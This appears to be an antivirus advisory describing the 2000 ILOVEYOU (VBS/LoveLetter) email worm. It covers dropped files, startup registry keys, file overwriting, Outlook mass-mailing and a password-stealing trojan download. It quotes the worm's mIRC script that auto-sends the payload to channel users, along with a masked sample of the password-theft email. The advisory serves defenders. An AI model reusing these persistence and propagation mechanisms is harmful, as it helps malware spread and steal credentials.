Virus Name: VBS/LoveLetter.worm
Aliases: none known
Date Discovered: Thursday May 4th 2000
DAT included: 4077
Risk: High
Characteristics:
This worm is a VBS program that is sent attached to an email with the
subject ILOVEYOU.
The mail contains the message "kindly check the attached LOVELETTER coming
from me."
The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs
If the user runs the attachment the worm runs using the Windows Scripting
Host program. This is not normally present on Windows 95 or Windows NT
unless Internet Explorer 5 is installed.
When the worm is first run it drops copies of itself in the following
places :-
C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS
It also adds the registry keys :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs
in order to run the worm at system start-up.
The worm replaces the following files :-
*.JPG
*.JPEG
*.MP3
*.MP2
with copies of itself and it adds the extension .VBS to the original
filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
contain the worm.
The worm also overwrites the following files :-
*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA
with copies of itself and renames the files to *.VBS.
The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and
this is then sent to the IRC channels if the mIRC client is installed. This
is accomplished by the worm replacing the file SCRIPT.INI with the following
script :-
[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}
After a short delay the worm uses Microsoft Outlook to send copies of itself
to all entries in the address book.
The mails will be of the same format as the original mail.
This worm also has another trick up it's sleeve in that it tries to download
and install an executable file called WIN-BUGSFIX.EXE from the Internet.
This exe file is a password stealing program that will email any cached
passwords to the mail address [log in to unmask]
In order to facilitate this download the worm sets the start-up page of
Microsoft Internet Explorer to point to the web-page containing the password
stealing trojan.
The email sent by this program is as follows :-
From: [log in to unmask]: [log in to unmask]: Barok...
email.passwords.sender.trojanX-Mailer: Barok...
email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP
Address: 192.168.0.2
RAS Passwords:...
<password information goes here>
...
Cache Passwords:...
<password information goes here>
...
goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:
MAPI : MAPI
The password stealing trojan is also installed via the following registry
key :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
to auto run at system start-up.
After it has been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi
nFAT32.EXE
